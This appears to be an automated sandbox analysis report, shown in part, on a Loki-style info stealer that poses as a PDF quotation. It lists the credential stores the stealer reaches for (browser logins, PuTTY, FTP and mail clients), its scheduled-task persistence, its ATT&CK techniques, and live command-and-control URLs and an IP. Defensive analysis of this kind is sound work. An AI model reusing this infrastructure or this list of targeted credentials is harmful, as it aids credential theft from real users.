                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeQueries volume information: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.mexnJkivovwH.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.mexnJkivovwH.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Quotation2025-0107pdf.exe PID: 7332, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: mexnJkivovwH.exe PID: 7908, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: mexnJkivovwH.exe PID: 8124, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 00000008.00000002.2909417745.0000000000A92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Quotation2025-0107pdf.exe PID: 7772, type: MEMORYSTR
                    Source: Yara matchFile source: 9.2.mexnJkivovwH.exe.3cca880.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation2025-0107pdf.exe.9a00000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.mexnJkivovwH.exe.3cea8a0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation2025-0107pdf.exe.4ae8e90.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.mexnJkivovwH.exe.3cea8a0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation2025-0107pdf.exe.4ae8e90.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation2025-0107pdf.exe.9a00000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.mexnJkivovwH.exe.3cca880.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1720797556.0000000009A00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1714510226.0000000004AC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1751386297.0000000003CA8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1751386297.0000000003CEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: PopPassword13_2_0040D069
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: SmtpPassword13_2_0040D069
                    Source: Yara matchFile source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.mexnJkivovwH.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.mexnJkivovwH.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 9.2.mexnJkivovwH.exe.3cca880.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation2025-0107pdf.exe.9a00000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.mexnJkivovwH.exe.3cea8a0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation2025-0107pdf.exe.4ae8e90.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.mexnJkivovwH.exe.3cea8a0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation2025-0107pdf.exe.4ae8e90.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation2025-0107pdf.exe.9a00000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.mexnJkivovwH.exe.3cca880.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1720797556.0000000009A00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1714510226.0000000004AC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1751386297.0000000003CA8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1751386297.0000000003CEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Scheduled Task/Job
                    1
                    Scheduled Task/Job
                    111
                    Process Injection
                    1
                    Masquerading
                    2
                    OS Credential Dumping
                    111
                    Security Software Discovery
                    Remote Services1
                    Email Collection
                    1
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading
                    1
                    Scheduled Task/Job
                    11
                    Disable or Modify Tools
                    2
                    Credentials in Registry
                    1
                    Process Discovery
                    Remote Desktop Protocol11
                    Archive Collected Data
                    3
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading
                    31
                    Virtualization/Sandbox Evasion
                    Security Account Manager31
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin Shares2
                    Data from Local System
                    2
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                    Process Injection
                    NTDS1
                    Application Window Discovery
                    Distributed Component Object ModelInput Capture112
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                    Deobfuscate/Decode Files or Information
                    LSA Secrets1
                    File and Directory Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                    Obfuscated Files or Information
                    Cached Domain Credentials13
                    System Information Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items42
                    Software Packing
                    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1585262 Sample: Quotation2025-0107pdf.exe Startdate: 07/01/2025 Architecture: WINDOWS Score: 100 47 Suricata IDS alerts for network traffic 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 13 other signatures 2->53 7 Quotation2025-0107pdf.exe 7 2->7         started        11 mexnJkivovwH.exe 2->11         started        process3 file4 37 C:\Users\user\AppData\...\mexnJkivovwH.exe, PE32 7->37 dropped 39 C:\Users\...\mexnJkivovwH.exe:Zone.Identifier, ASCII 7->39 dropped 41 C:\Users\user\AppData\Local\...\tmp2404.tmp, XML 7->41 dropped 43 C:\Users\...\Quotation2025-0107pdf.exe.log, ASCII 7->43 dropped 55 Detected unpacking (changes PE section rights) 7->55 57 Detected unpacking (overwrites its own PE header) 7->57 59 Uses schtasks.exe or at.exe to add and modify task schedules 7->59 67 2 other signatures 7->67 13 Quotation2025-0107pdf.exe 203 7->13         started        17 powershell.exe 23 7->17         started        19 powershell.exe 23 7->19         started        21 schtasks.exe 1 7->21         started        61 Multi AV Scanner detection for dropped file 11->61 63 Tries to steal Mail credentials (via file registry) 11->63 65 Machine Learning detection for dropped file 11->65 23 schtasks.exe 11->23         started        25 mexnJkivovwH.exe 11->25         started        signatures5 process6 dnsIp7 45 94.156.177.41, 49735, 49737, 49739 NET1-ASBG Bulgaria 13->45 69 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->69 71 Tries to steal Mail credentials (via file / registry access) 13->71 73 Tries to harvest and steal ftp login credentials 13->73 75 Tries to harvest and steal browser information (history, passwords, etc) 13->75 77 Loading BitLocker PowerShell Module 17->77 27 conhost.exe 17->27         started        29 WmiPrvSE.exe 17->29         started        31 conhost.exe 19->31         started        33 conhost.exe 21->33         started        35 conhost.exe 23->35         started        signatures8 process9

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    Quotation2025-0107pdf.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\mexnJkivovwH.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\mexnJkivovwH.exe24%ReversingLabsWin32.Ransomware.Loki
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://94.156.177.41/mars/five/fre.php100%Avira URL Cloudmalware
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    http://kbfvzoboss.bid/alien/fre.phpfalse
                      high
                      http://94.156.177.41/mars/five/fre.phptrue
                      • Avira URL Cloud: malware
                      unknown
                      http://alphastand.top/alien/fre.phpfalse
                        high
                        http://alphastand.win/alien/fre.phpfalse
                          high
                          http://alphastand.trade/alien/fre.phpfalse
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.apache.org/licenses/LICENSE-2.0Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.fontbureau.comQuotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.fontbureau.com/designersGQuotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.fontbureau.com/designers/?Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.founder.com.cn/cn/bTheQuotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.fontbureau.com/designers?Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.ibsensoftware.com/mexnJkivovwH.exe, mexnJkivovwH.exe, 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                          high
                                          http://www.tiro.comQuotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.fontbureau.com/designersQuotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.goodfont.co.krQuotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://www.chiark.greenend.org.uk/~sgtatham/putty/0Quotation2025-0107pdf.exe, mexnJkivovwH.exe.0.drfalse
                                                  high
                                                  http://www.carterandcone.comlQuotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.sajatypeworks.comQuotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.typography.netDQuotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.fontbureau.com/designers/cabarga.htmlNQuotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.founder.com.cn/cn/cTheQuotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.galapagosdesign.com/staff/dennis.htmQuotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.founder.com.cn/cnQuotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.fontbureau.com/designers/frere-user.htmlQuotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.jiyu-kobo.co.jp/Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.galapagosdesign.com/DPleaseQuotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.fontbureau.com/designers8Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.fonts.comQuotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.sandoll.co.krQuotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.urwpp.deDPleaseQuotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.zhongyicts.com.cnQuotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQuotation2025-0107pdf.exe, 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, mexnJkivovwH.exe, 00000009.00000002.1749098659.0000000002449000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.sakkal.comQuotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs
                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    94.156.177.41
                                                                                    unknownBulgaria
                                                                                    43561NET1-ASBGtrue
                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1585262
                                                                                    Start date and time:2025-01-07 12:31:06 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 6m 24s
                                                                                    Hypervisor based Inspection enabled:false
